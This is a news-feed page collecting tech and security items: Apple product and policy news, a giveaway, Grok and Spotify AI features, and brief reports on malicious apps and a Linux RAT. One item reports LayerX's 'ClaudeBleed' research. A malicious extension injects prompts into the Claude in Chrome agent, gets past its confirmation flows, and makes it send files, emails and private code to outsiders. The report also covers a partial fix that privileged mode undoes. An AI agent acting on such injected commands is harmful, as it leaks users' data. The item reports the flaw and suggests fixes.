The hub has a 10Gb/s USB-C port, an HDMI 2.0 port, microSD and SD card slots, a USB 2.0 port, two 10Gb/s USB-A ports (one offers 15W charging for accessories), a USB-C port for 125W passthrough charging to the connected Mac, and a Gigabit Ethernet port. Plugable currently has a 15% discount on the 9-in–1 Hub on Amazon.


Plugable's ‌MacBook Neo‌ accessory lineup is rounded out with a compact $24 USB-C Charger Block, which comes in either black or white. The power adapter provides 30W for the ‌MacBook Neo‌, which is ideal. It uses GaN technology so it's small in size, and it has collapsible prongs, making it ideal for travel. Plugable is offering a 16% discount on the power adapter on Amazon this week.


We have a ‌MacBook Neo‌ and a Plugable accessory kit to go along with it for one lucky MacRumors reader. To enter to win, use the widget below and enter an email address. Email addresses will be used solely for contact purposes to reach the winner(s) and send the prize(s). You can earn additional entries by subscribing to our weekly newsletter, subscribing to our YouTube channel, following us on Twitter, following us on Instagram, following us on Threads, or visiting the MacRumors Facebook page.

Due to the complexities of international laws regarding giveaways, only U.S. residents who are 18 years or older are eligible to enter. All federal, state, provincial, and/or local taxes, fees, and surcharges are the sole responsibility of the prize winner. To offer feedback or get more information on the giveaway restrictions, please refer to our Site Feedback section, as that is where discussion of the rules will be redirected.


Plugable Giveaway (U.S. Only)The contest will run from today (May 8) at 9:00 a.m. Pacific Time through 9:00 a.m. Pacific Time on May 15. The winner will be chosen randomly on or shortly after May 15 and will be contacted by email. The winner will have 48 hours to respond and provide a shipping address before a new winner is chosen.Related Roundup: MacBook NeoTag: GiveawayBuyer's Guide: MacBook Neo (Buy Now)Related Forum: MacBook Neo
This article, "MacRumors Giveaway: Win a MacBook Neo and Accessory Kit From Plugable" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Cybersecurity researchers have discovered fraudulent apps on the official Google Play Store for Android that falsely claimed to offer access to call histories for any phone number, only to trick users into joining a subscription that provided fake data and incurred financial loss. The 28 apps have collectively racked up more than 7.3 million downloads, with one of them alone accounting for overView the full article
On this week's episode of The MacRumors Show, we talk through how the global memory shortage is forcing Apple's hand across multiple key products, killing configurations, delaying launches, and prompting spec decisions that would have seemed unlikely a year ago.

Subscribe to The MacRumors Show YouTube channel for more videos
The pressure originates outside Apple's control. JPMorgan analysis cited by the Financial Times found that memory could account for as much as 45% of an iPhone's component costs by 2027, up from around 10% today. Companies like Nvidia are reportedly outbidding consumer electronics makers for limited DRAM supply from Samsung, SK Hynix, and Micron, while cloud firms are locking in capacity with multi-billion-dollar upfront commitments. Apple, which buys memory for roughly 250 million iPhones per year, has shifted from a position where it could dictate terms to one where it must compete for supply, and component prices are being driven up as a result.

The consequences are already visible in the Mac lineup. Apple last week removed the Mac mini's 256GB storage option, pushing its starting price from $599 to $799. Days later, it eliminated Mac mini models with 32GB and 64GB of RAM and stripped the M3 Ultra Mac Studio to a single 96GB configuration, with delivery estimates for remaining Studio models at 9 to 10 weeks. The ‌Mac Studio‌ had already lost its 512GB memory option in March, and multiple configurations became entirely unavailable in April. On Apple's April 30 earnings call, CEO Tim Cook acknowledged that both machines would be "hard to get for months to come" and said Apple expects "significantly higher memory costs" in the current quarter.

The MacBook Neo was sold out through April and Cook described demand on the earnings call as "off the charts." The ‌MacBook Neo‌ uses binned A18 Pro chips, adopting manufacturing rejects from the iPhone 16 lineup with one GPU core disabled, repurposed rather than discarded to keep costs low enough to hit the $599 price point.

Apple's initial production target is believed to be about five to six million units, but demand has since pushed the company to instruct suppliers to prepare for at least 10 million. TSMC's N3E production lines, where the A18 Pro was made, are now running at maximum capacity, with AI-related orders consuming much of the available output. A fresh manufacturing run for the A18 Pro would yield fully functional chips rather than defective ones, raising the per-unit cost before any expedited manufacturing premium is applied.

Apple is now said to be weighing up its options for the ‌MacBook Neo‌. The company is purportedly considering cutting the 256GB entry-level model, which would push the effective starting price up by $100 without changing any existing configuration's price, the same mechanism used with the ‌Mac mini‌. Separately, Apple may be considering new color options to soften any price increase.

Upcoming products are apparently being reshaped too. Weibo leaker "Fixed Focus Digital" has claimed in a series of posts that the standard iPhone 18 is being downgraded as a cost-cutting measure, with both display and chip specifications affected. Most recently, the leaker said certain parts are interchangeable between the ‌iPhone 18‌ and the lower-cost iPhone 18e. For context, iPhone 17 and iPhone 17e differ meaningfully: the standard model has a larger ProMotion display, Dynamic Island, Ultra Wide camera, five-core GPU, and significantly better battery life, but it looks like there could be fewer differences with the next generation.

A follow-up post framed the new split launch strategy, under which the ‌iPhone 18‌ ships in spring 2027 rather than alongside the Pro models in the fall, as a deliberate commercial mechanism to smooth out demand. By extending the ‌iPhone 17‌'s flagship run, Apple is also said to be creating conditions under which a lower-specced successor will be more palatable. The split launch itself has been widely reported since last year, with Ming-Chi Kuo and Nikkei among those to have corroborated it.

The launch of the rumored all-new high-end MacBook Pro or "MacBook Ultra" with an OLED display and touchscreen has also apparently slipped. Bloomberg's Mark Gurman has said early 2027 is now looking more likely than late 2026 due to Apple's constrained memory supply.

The MacRumors Show has its own YouTube channel, so make sure you're subscribed to keep up with new episodes and clips.

Subscribe to The MacRumors Show YouTube channel!

You can also listen to ‌The MacRumors Show‌ on Apple Podcasts, Spotify, Overcast, or other podcast apps. You can also copy our RSS feed directly into your player.



If you haven't already listened to the previous episode of The MacRumors Show, catch up to hear our answers to your listener questions about the future of Apple's product lineup, the software and services shaping the ecosystem, and our own personal histories with the company and its devices.

Subscribe to ‌The MacRumors Show‌ for new episodes every week, where we discuss some of the topical news breaking here on MacRumors, often joined by interesting guests such as Kayci Lacob, Kevin Nether, John Gruber, Mark Gurman, Jon Prosser, Luke Miani, Matthew Cassinelli, Brian Tong, Quinn Nelson, Jared Nelson, Eli Hodapp, Mike Bell, Sara Dietschy, iJustine, Jon Rettinger, Andru Edwards, Arnold Kim, Ben Sullins, Marcus Kane, Christopher Lawley, Frank McShan, David Lewis, Tyler Stalman, Sam Kohl, Federico Viticci, Thomas Frank, Jonathan Morrison, Ross Young, Ian Zelbo, and Rene Ritchie.

‌The MacRumors Show‌ is on X @MacRumorsShow, so be sure to give us a follow to keep up with the podcast. You can also email us at [email protected] or head over to The MacRumors Show forum thread. Remember to rate and review the podcast, and let us know what subjects and guests you would like to see in the future.Related Roundup: iPhone 18Tag: The MacRumors ShowRelated Forum: iPhone
This article, "The MacRumors Show: Is Apple Downgrading iPhone 18 Due to Memory Shortage?" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Starting today, Apple will require customers in the U.S., Canada, and Chile to verify their status as a student or educator to get educational discounts. Apple is adopting the UNiDAYS verification system that it uses in other countries, with a new process to accommodate homeschool families.


Apple is also adding the Apple Watch Series 11, Apple Watch SE, and Apple Watch Ultra 3 to its Education Store, which means students and teachers are now eligible for up to a 10 percent discount on Apple's most popular wearable.

Students and educators in the three countries can use the UNiDAYS app or website to verify their academic status with an email address from an educational institution, a student or staff photo ID, or another valid educational document.


Eligible customers who homeschool can also be verified by UNiDAYS. Verification requires an identity document like a driver's license or passport, and a homeschool document, such as a Letter of Intent or Letter of Acknowledgement. Most customers will be verified instantly, with UNiDAYS providing a decision in under 24 hours when manual review is required.


Once confirmed through UNiDAYS, students and educators in the U.S., Canada, and Chile will be able to purchase the Apple Watch and other Apple devices at Apple's discounted educational prices. Apple's Education Store offers special pricing on Macs, iPads, and the Studio Display, along with accessories like the Magic Keyboard and the Apple Pencil.

Apple did not previously have an established academic status verification system in the U.S. or Canada, which meant that anyone could technically purchase from the Education Store. Apple's sales policies said that it routinely audited customer purchases to verify purchase conditions were followed. Apple briefly used UNiDAYS in the U.S. in 2022 to verify student status, but it was removed after a few days following complaints about issues with the verification process.

Apple's Education Store discounts are available to employees of K–12 institutions, faculty and staff of higher education institutions, students attending or accepted to higher education institutions, and parents purchasing on behalf of children attending or accepted to a higher education institution.

In addition to the U.S., Canada, and Chile, Apple has added the Apple Watch to the Education Store in Australia, China, Hong Kong, Japan, Malaysia, Singapore, South Korea, Taiwan, Thailand, Vietnam, France, Germany, India, Italy, Saudi Arabia, Spain, Turkey, and the UK.

Apple also expanded UNiDAYS verification requirements to Australia, Hong Kong, and Turkey yesterday.Related Roundup: Apple Watch 11Buyer's Guide: Apple Watch (Caution)
This article, "Apple Now Requires UNiDAYS Verification for Education Discounts in U.S. and Canada, Adds Apple Watch" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
SpaceXAI has released Grok Voice mode for Apple CarPlay, allowing CarPlay users to ask the chatbot questions and make requests directly from their vehicle dashboard, handsfree.


Previously, Grok for iPhone displayed a placeholder app in CarPlay saying the handsfree support would be coming soon. Grok comes built-in on Tesla vehicles, but now almost any other car can access it.

Apple started permitting third-party voice-driven conversational apps to integrate with ‌CarPlay‌ in iOS 26.4, but developers must add support for the feature and obtain a special entitlement from Apple.

Apple requires apps to use its voice control template for CarPlay. Whenever voice-based services are active, apps must display the voice control interface and can include up to four action buttons. However, Apple says chatbot apps should not show text or imagery in response to queries.

Grok Voice mode joins ChatGPT and Perplexity, which arrived on CarPlay in March and April, respectively.


‌CarPlay‌ has supported third-party apps for years, but Apple restricts the types of apps permitted on the platform to reduce driver distractions. Apple maintains a list of approved app categories, including audio, communication, EV charging, and navigation apps.Related Roundup: CarPlayTag: GrokRelated Forum: HomePod, HomeKit, CarPlay, Home & Auto Technology
This article, "Grok AI Voice Mode Arrives on Apple CarPlay" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Managed SOC services are entering a transition period. Customers still want expert oversight, but they also expect a service model that can keep up with rising alert volume, faster attack cycles, and tighter expectations around efficiency and visibility. In this blog, we look at why agentic operations are becoming the new standard in the managed SOC market and what that means for organizations evaluating the future of autonomous SOC and agentic SOC services. The current 2026 conversation around AI in security makes one thing clear: buyers are interested in progress, but they are equally focused on accountability, explainability, and measurable results.
View the full article
Anthropic Claude’s Chrome browser extension, known as Claude in Chrome, has a bug that can allow other malicious extensions to hijack it, compromising trusted AI workflows.
Researchers at LayerX Security have warned that Claude’s overly trusted browser communication flows can be abused to inject scripts that can potentially hijack the assistant’s capabilities and manipulate browsing sessions.
LayerX is calling the flaw  “ClaudeBleed.”
“LayerX reported the flaw to Anthropic,” LayerX researcher Aviad Gispan said in a blog post. “Anthropic replied that they were already aware of the issue and that it would be fixed in the next version of the extension.” However, Gispan added, Anthropic’s fix was partial, and the flaw can still be exploited.
The post demonstrated different ways the flaw can still be exploited, including sending a file from a Google Drive folder to an outsider, sending an email on behalf of a remote attacker, stealing code from a private repository on GitHub, and summarizing emails and sending them to an external user.
“ClaudeBleed is a useful demonstration of why monitoring AI agents at the prompt layer is fundamentally insufficient,” said Ax Sharma, head of research at Manifold Security. “The most sophisticated part of this attack isn’t the injection, but that the agent’s perceived environment was manipulated to produce actions that looked legitimate from the inside. That’s the class of threat the industry needs to be building defenses for.”
Maliciously injected instructions can lead to attacks
Gispan said the issue is an instruction in the extensions’ code that allows arbitrary scripts running in the origin browser to communicate with Claude’s LLM. But there is nothing in the code that checks who is running the script.
This potentially allows any extension to invoke a malicious script, without requiring any special permissions, that can issue commands to the Claude extension.
“The extension exposes a privileged message interface to the main claude.ai LLM via externally_connectable, which is a manifest setting that defines which external websites or extensions are allowed to communicate with your extension,” Gispan explained. “It trusts the origin (claude.ai) rather than the actual execution context.”
As a result, even a “minimal” extension can execute arbitrary prompts, breach Claude’s LLM guardrails, bypass user confirmation flows, manipulate Claude’s perception of the UI, and perform sensitive cross-site actions (Gmail, Google Drive, GitHub).
“This vulnerability effectively breaks Chrome’s extension security model by allowing a zero-permission extension to inherit the capabilities of a trusted AI assistant,” Gispan pointed out.
Anthropic fixed the issue, but
Anthropic released an updated extension version (version 1.0.70) on May 6 with a patch and a catch.
In its update, Gispan explained, Anthropic added a layer of internal security checks to prevent extensions from executing remote commands, but the checks only applied to “standard” mode. By switching the extension to “privileged” mode, which does not require explicit user permission or notification, the exposure could be brought back, and commands can be executed just as before.
Anthropic had reportedly promised an update that would remove the responsible message handler. “A fix that removes the affected message handler has been merged and will ship in an upcoming extension release,” Gispan said, citing a communication from the company.
But the fix fell short on the promise. “Contrary to their initial response, the externally_connectable message handler was not removed, but Anthropic did introduce additional approval flows for privileged actions,“ he added.
Anthropic did not immediately respond to CSO’s request for comments.
LayerX recommended several mitigation measures, including introducing extension-to-page authentication tokens such as signed requests, restricting “externally_connectable” permissions to trusted extension IDs instead of origins, and binding user approvals to specific actions and one-time tokens.
View the full article
Apple and Meta have opposed a Canadian bill that the companies say could force them to create backdoor access to encrypted user data, should it pass through the country's parliament.


Proposed by Canada's ruling Liberal Party, Bill C-22 contains provisions that could be similar ​to a UK data access provision order sent to Apple last year, depending on how they are implemented.

Back in February 2025, the British government demanded that Apple give it blanket access to all encrypted user content uploaded to the cloud. Apple refused, and instead pulled its Advanced Data Protection iCloud feature from the United Kingdom.

U.S. officials later said Britain had dropped the request after the director of national intelligence, Tulsi Gabbard, raised concerns that it could violate a cloud data treaty and tap into US citizens' data.

Apple now finds itself in a similar standoff across the Atlantic. Canadian law enforcement ​officials say Bill C-22 would help them investigate security threats earlier and act more quickly. But Apple has pushed back against the proposed legislation. The company provided Reuters with the following statement:
Meta also argued that the bill contained "sweeping powers, minimal oversight, and lack of clear safeguards" that could end up making Canadians less safe, rather than more.

Apple CEO Tim Cook has consistently insisted that providing back-door access past its encryption for authorities would open the door for "bad guys" to gain access to its users' data. Cyber security experts agree that it would only be a matter of time before bad actors discover such a point of entry. Apple's stance was enhanced in 2016 when it successfully fought a US order to unlock the iPhone of a shooter in San Bernardino, California.

The Canadian bill is currently being debated in the House of Commons.Tags: Apple Privacy, Apple Security, Canada, Encryption
This article, "Apple Warns Canada's Bill C-22 Could Force Encryption Backdoors" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
A previously undocumented Linux implant codenamed Quasar Linux RAT (QLNX) is targeting developers' systems to establish a silent foothold as well as facilitate a broad range of post-compromise functionality, such as credential harvesting, keylogging, file manipulation, clipboard monitoring, and network tunneling. "QLNX targets developers and DevOps credentials across the software supply chain,"View the full article
The dark secret of enterprise security operations is that defenders have quietly institutionalized the practice of not looking. This is not just anecdotal, but rather backed by a recent report investigating more than 25 million security alerts, including informational and low-severity, across live enterprise environments.  The dataset behind these findings includes 10 million monitoredView the full article
Spotify has launched a new feature that lets users save AI-generated audio briefings called Personal Podcasts directly to their Spotify library. It uses a new command-line tool for desktop that works with AI coding agents like OpenAI's Codex and Anthropic's Claude Code.


After you install the Save to Spotify CLI from GitHub and sign into your Spotify account, you can prompt the agent to generate a custom audio piece, like a daily news digest, a study guide pulled from class notes, or a weekly itinerary. Once generated, it appears alongside your music and regular podcasts in Your Library.

Here's how Spotify frames it. From the company's newsroom post:
Spotify offers a few use case examples to get you started, such as a morning briefing that flags upcoming meetings, checks the weather, and recommends a commute podcast, or a progressively deeper audio series built from saved articles and personal notes for learning a new subject.

The feature remains in beta but is available worldwide to eligible Free and Premium subscribers, though Spotify cautions that there are usage limits during the testing period.

The CLI tool launch follows Spotify's release last month of a Claude integration that lets users connect their Spotify account to the chatbot and ask for personalized music and podcast recommendations directly in a conversation.Tag: Spotify
This article, "Spotify Now Plays Personal Podcasts Generated by Your AI Agent" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
OHC_logo_transparent_01.jpeg flags-medium.png OHC_logo_blue_square_small.jpeg

 

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.